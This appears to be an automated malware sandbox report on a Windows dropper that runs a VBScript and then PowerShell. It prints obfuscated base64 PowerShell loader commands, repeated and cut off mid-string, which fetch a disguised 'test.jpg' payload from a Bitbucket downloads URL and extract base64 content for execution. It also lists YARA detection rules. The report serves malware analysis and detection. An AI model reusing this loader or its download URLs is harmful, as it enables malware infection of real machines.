        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/img/logos/bi
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/jsi18n/en/dj
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 00000007.00000002.2200418834.00000218C3171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dfghd/fgd/downloads/tesb
        Source: powershell.exe, 00000005.00000002.2222459018.000001DB44B6A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2211178390.000001DB2CBF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2223008209.000001DB44CD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2174751532.00000218A9000000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2174751532.00000218A9020000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2200132855.00000218C30AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175147045.00000218A90A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175340763.00000218A92A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175666220.00000218AAC30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB5AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gateway/api/emoji/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.status.atlassian.com/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bqlf8qjztdtr.statuspage.io
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC09A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB8EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fdfghd%2Ffgd%2
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/logout
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/manage-profile/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://preferences.atlassian.com
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.6:49709 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@D
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@DJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F2D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7E74F2D70
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F1BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7E74F1BF4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F5F800_2_00007FF7E74F5F80
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F68F00_2_00007FF7E74F68F0
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F2EDC0_2_00007FF7E74F2EDC
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F6F140_2_00007FF7E74F6F14
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F1D100_2_00007FF7E74F1D10
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F41B40_2_00007FF7E74F41B4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F366E0_2_00007FF7E74F366E
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F5F7E0_2_00007FF7E74F5F7E
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F1BF40_2_00007FF7E74F1BF4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD348485FA7_2_00007FFD348485FA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD348483FB7_2_00007FFD348483FB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34916FCE7_2_00007FFD34916FCE
        Source: 00wVZ1NU5b.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5920 bytes, 1 file, at 0x2c +A "lol.vbs", ID 704, number 1, 1 datablock, 0x1503 compression
        Source: 00wVZ1NU5b.exeBinary or memory string: OriginalFilename vs 00wVZ1NU5b.exe
        Source: 00wVZ1NU5b.exe, 00000000.00000000.2103665981.00007FF7E74FE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 00wVZ1NU5b.exe
        Source: 00wVZ1NU5b.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 00wVZ1NU5b.exe
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5168
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5168Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.expl.evad.winEXE@12/8@1/1
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F4838 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00007FF7E74F4838
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F1BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7E74F1BF4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F68F0 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF7E74F68F0
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F5F80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00007FF7E74F5F80
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3392:120:WilError_03
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeProcess created: C:\Windows\System32\cmd.exe cmd /c lol.vbs
        Source: 00wVZ1NU5b.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 00wVZ1NU5b.exeReversingLabs: Detection: 15%
        Source: 00wVZ1NU5b.exeVirustotal: Detection: 16%
        Source: unknownProcess created: C:\Users\user\Desktop\00wVZ1NU5b.exe "C:\Users\user\Desktop\00wVZ1NU5b.exe"
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeProcess created: C:\Windows\System32\cmd.exe cmd /c lol.vbs
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I